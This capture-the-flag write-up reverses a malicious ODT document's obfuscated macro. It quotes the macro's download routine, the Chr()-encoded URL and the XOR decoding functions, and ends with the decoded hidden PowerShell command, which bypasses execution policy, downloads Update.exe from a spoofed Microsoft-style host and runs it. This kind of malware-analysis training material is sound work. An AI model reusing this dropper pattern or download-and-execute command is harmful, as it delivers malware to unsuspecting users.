Jun 18, 2022
4 mins read
Category: Reverse
Creator: HømardBøy
Attachments:
This challenge gives us an ODT file (that I didn’t open, but you can do it at your own risk). Since it was in the Reverse category, we can easily guess we will have to reverse a macro inside the document.
That’s aso what the description of the challenge tells us, pointing out that we have to identify the URL of a malicious resource downloaded by this document.
I’m not super familiar with the ODT document format, but I know one thing: the OpenDocument (as well as the Microsoft document format by the way) use ZIP archives! Therefore we can open them with a regular archive software.
I looked around and found a file called Module1.xml
in the folder Basic/Standard
. This name really reminded me of the default name for Visual Basic classes (and that’s the language for used for macros).
In this XML file, we can find the VBA code of the module, which really doesn’t look appealing.
The sub that called my attention is the Main
sub:
Sub Main
If vqqzycjqjpkhqvovmi() = 0 Then
Dim wzhtvfbpqbuzmustotc, Tmpwzhtvfbpqbuzmustotc As String
Dim hbtogbnfbxcaekszei, regaajfhpscnbmcwmwprjge As String
Dim ytnqvabyudituwreskajsxwdAs As String
Dim lhpvebwowSplit As Integer
If erwgpzsepdzttmjuvnovbwtc() = 1 Then
Tmpwzhtvfbpqbuzmustotc = mpocpedrdedylqthvgzdapya()
wzhtvfbpqbuzmustotc = amwxnlxcctjstjjgqlkspqnm(Tmpwzhtvfbpqbuzmustotc)
hbtogbnfbxcaekszei = cxyhvqmc(Tmpwzhtvfbpqbuzmustotc & wzhtvfbpqbuzmustotc)
regaajfhpscnbmcwmwprjge = qbyghksgdipg(hbtogbnfbxcaekszei)
regaajfhpscnbmcwmwprjge = yqzfgdmt(regaajfhpscnbmcwmwprjge)
rukbizjwgxckvFlag(regaajfhpscnbmcwmwprjge)
...
Once we clean and translate it a bit, we get:
Sub Main
Dim FileName, FolderPath As String
Dim FileContent, DecryptedCode As String
FolderPath = CreateTempFolder()
FileName = DownloadCode(FolderPath)
FileContent = ReadFile(FolderPath & FileName)
DecryptedCode = ReplaceThings(FileContent)
DecryptedCode = Decrypt(DecryptedCode)
Run(DecryptedCode)
...
First I checked this “DownloadCode” sub. It calls an external function from Windows called URLDownloadToFile
, and since it is imported in the code, we can find its signature:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szqegxabjgwrvivilr As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
From this, we infer that the URL is the second argument.
Next, something we can find accross the whole script is the way it builds strings. For example:
wbsggcbesxgmx = Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & Chr(114) & "" & Chr(101) & "" & Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & Chr(99) & "" & Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & Chr(47) & "" & Chr(114) & "" & Chr(97) & "" & Chr(119) & ""
URLDownloadToFile(ynkgtlqhx, wbsggcbesxgmx, Macrokvjymzmbg, ynkgtlqhx, ynkgtlqhx)
I chose this example on purpose because it builds the string used as the URL. The resulting URL is: https://rentry.co/t69hh4/raw
I tried this URL as the flag but obviously it couldn’t be that simple. In fact, the content of this file is a very big number:
509923764891063459923764891063539923764891063399923764891063489923764891063499923764891063429923764891063399923764891063469923764891063469923764891063108992376489106339992376489106358992376489106339992376489106398992376...
So let’s look at the other subs:
Sub ReplaceThings(BigNumber As String) As String
Dim result As String
result = Replace(BigNumber, "9657665657376593676575387986", "")
result = Replace(BigNumber, "9923764891063", " ")
Return result
End Sub
Sub Decrypt(EncryptedString As String) As String
Dim Characters() As Integer
Dim c As Integer
Dim result As String
result = ""
Characters = Split(EncryptedString, " ")
for each c in Characters
Dim DecryptedChar = c XOR 66
result = result & Chr(DecryptedChar)
next
Return result
End Sub
From there, decrypting the text becomes fairly easy, by using those two functions. We then get:
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://microsoft.security.update.fake/files/Update.exe","$env:APPDATA\\Update.exe"); Start-Process ("$env:APPDATA\\Update.exe")
And we get a new URL which is the flag: http://microsoft.security.update.fake/files/Update.exe
Sharing is caring!